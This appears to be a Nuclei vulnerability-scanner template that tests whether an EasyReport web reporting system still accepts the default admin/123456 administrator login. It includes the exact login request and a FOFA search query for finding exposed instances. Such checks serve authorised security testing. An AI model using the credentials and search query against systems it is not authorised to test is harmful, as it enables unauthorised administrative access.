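id: easyreport-default-login

info:
  name: EasyReport - Default Login
  author: SleepingBag945
  severity: high
  description: |-
    Checks whether an EasyReport instance still accepts the vendor default
    administrator credentials (account admin / password 123456). The template
    reports a match only when the login endpoint answers 200 with a JSON body
    containing "data":true.
  classification:
    cwe-id: CWE-798
  metadata:
    verified: true
    # one username/password pair under pitchfork -> exactly one request
    max-request: 1
    fofa-query: body="EasyReport-A Sample and Easy to Use Web Reporting System"
  tags: easyreport,default-login,vuln

http:
  - raw:
      - |
        POST /member/authenticate HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        account={{username}}&password={{password}}&rememberMe=false

    # pitchfork pairs username[i] with password[i] instead of a full
    # cross product, so the lists below must stay the same length.
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        # quoted so the YAML loader keeps the value as the string "123456"
        # rather than inferring an integer
        - '123456'

    # all three matchers must hit: success JSON body, JSON content type, 200
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":'
          - '"detailMsg":'
          - '"data":true'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'

      - type: status
        status:
          - 200

# NOTE(review): the digest below presumably signs the original template text;
# after any edit it will no longer match and the template must be re-signed.
# digest: 490a00463044022041104e7956589ecdba959983f3c7320ef45cd2aa30abf7be561f256e872ceb1c0220284bb65d24c2539088264f53cd58ab2855950d7a6b10f80954b1e83d3b8bde25:922c64590222798bb761d5b6d8e72950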